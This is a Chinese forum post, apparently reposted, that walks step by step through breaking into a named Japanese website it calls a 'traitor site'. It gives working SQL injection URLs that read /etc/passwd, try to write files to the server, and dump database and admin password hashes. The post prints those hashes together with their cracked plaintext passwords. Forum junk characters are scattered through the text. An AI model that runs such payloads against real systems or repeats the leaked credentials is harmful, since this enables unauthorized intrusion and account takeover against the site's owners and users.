原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

3 `$ Q. n3 y$ V/ l9 ~9 D
7 f* K1 h: s! [+ l0 N0x01. 检测 www.zuaa.jp 收集数据
6 Y4 G: q/ @, V

whatweb

; |$ F5 L6 \0 V3 n0 `
0 Q7 g: J4 V6 u; a7 M利用NMAP扫描
7 j+ z( C( |5 b, E) L
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
/ o+ x; R2 K4 ?" O; Q

0x03.order by
( y1 F: t. ?  H$ u/ Z" n: u0 ]             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常
+ @  {9 P* W" x. S/ d
# |! A" {( K! T& ^0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
' H, w8 I( v, w6 k  S添加到 27 时正常显示
* q- {' g3 \0 B! o- I
7 j: e. P7 d# N. f中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
4 u: N6 A" A: o+ W
0x05. info:
; [2 `# @1 g  Uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 B9 j% @; T+ l' m) J% i3 p. D
1 G- r: |0 D$ `  Z9 F6 g; k" ]% @1 Auser:            root@localhost
( S# _2 s8 r% Z8 W8 `/ N: |7 ndatabase:    openpne
version:      4.1.22
os:             portbld-freebsd5.4

0x06. root用户
; |# t$ v. _( I利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
- r6 U6 i& c/ m' T% J* d' ]8 s* `http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, P: {. Q  g7 A" s' [  |3 |0 c
通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
3 o! |$ M, ~+ Y" u4 Q: \& t
0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”
: L$ N' O9 m3 a. A
6 N, V0 m, T  M8 R2 J0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持



0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
( P7 u  V/ C2 g/ g# B从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
$ q& G* D' I$ H( Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

$ W6 |5 r% z1 C0 \这个可以在 www.cmd5.com 解密
% C- J( F8 ?8 g7 Y. G: I) v2 kroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
2 u3 ^3 d' ?2 X1 S, `chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
. d2 E5 s4 ~2 w+ f5 x8 @
* j% j3 q# G7 t) |* ^  ~: I+ i" Q
0x11. 网站突破
& D3 q, i! g8 S9 P发现网站的源程序 openpne, google 下载 openpne 源码
' g7 g. i5 \6 N4 P# f; z4 {

0x12. 默认信息利用
; d& m7 c: ~- o# D! E! @; Mhttp://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
3 [# M" d" O1 _8 t8 Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
4 U4 K& X9 g, J6 ]  ~
解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

: S) G5 S3 f' F- R* m5 u" [  i中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

9 {' F: \' z. N9 J0 k5 `, n  `0x13. 登录后台
& }+ T% m# P! n4 f3 m/ q
3 x- J3 m- c( x2 f. B( n. Z

% n8 _' E; x0 g7 Z0x14. 小结
% a5 w/ o: O& d2 G6 Z* `7 d6 J/ ~利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
$ {% ^$ ~6 Z/ y6 g" q* V感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
. X" O7 N1 [: N, M; K------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
% a, S+ A* b$ `7 u
/ [  S, k% ^9 c最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
: W- x% n$ p8 u9 [( s  E' g) G; G

荒村狂客

哪个牛人 费的这劲 入侵的